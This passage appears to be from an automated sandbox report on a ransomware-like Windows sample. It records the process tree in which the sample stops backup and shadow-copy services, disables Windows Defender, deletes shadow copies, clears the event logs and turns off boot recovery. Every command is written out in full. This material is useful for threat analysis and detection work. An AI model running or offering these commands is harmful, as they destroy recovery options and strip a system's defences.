PID 3500 wrote to memory of 668 3500 net.exe net1.exe PID 2224 wrote to memory of 692 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 692 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 1436 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 1436 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 896 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 896 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 2960 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 2960 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 340 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 340 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 2012 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 2012 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 2932 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 2932 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 1488 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 1488 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 2060 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 2060 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 2224 wrote to memory of 1800 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe reg.exe PID 2224 wrote to memory of 1800 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe reg.exe PID 2224 wrote to memory of 3040 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe reg.exe PID 2224 wrote to memory of 3040 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe reg.exe PID 2224 wrote to memory of 2132 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe reg.exe PID 2224 wrote to memory of 2132 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe reg.exe PID 2224 wrote to memory of 3248 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe reg.exe PID 2224 wrote to memory of 3248 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe reg.exe PID 2224 wrote to memory of 2920 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe reg.exe PID 2224 wrote to memory of 2920 2224 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3152
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1336
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:932
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:3164
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3972
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3604
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1480
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:212
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_13373" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_13373" /y3⤵PID:668
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:692
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1436
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:896
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:2960
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:340
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2012
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2932
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1488
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_13373" start= disabled2⤵PID:2060
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1800
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3040
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2132
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3248
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2920
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3808
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:684
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3644
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3664
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3076
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1252
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2144
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3152
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1212
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:640
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:368
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:420
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3948
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3744
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3728
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1420
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:216
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:596
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2976
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3036 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1380 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3504 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2284
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3044
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1776
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1032
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2160 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1748
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3528 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3676 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3712 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3896 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3532 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3164 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1512 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3816
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3628 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1068 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3064
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3368
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
659e84e92d8fe213d32e0a9ce468d81d
SHA106f40e72ef5c8bee8904d7bf6fd03fe892817fe9
SHA2566d06ee5f7f9540d181b654fd43e0233b5befa323d43d75663379deeb6644b6f3
SHA512b45f840331bf4c6bbcb0284a2e33735fb94f86675b53237bab789620e8ab7fa19664cdf9b245a1cd1a6860ad1f924e0c0824222e3047356a0dc00e02ef925a2c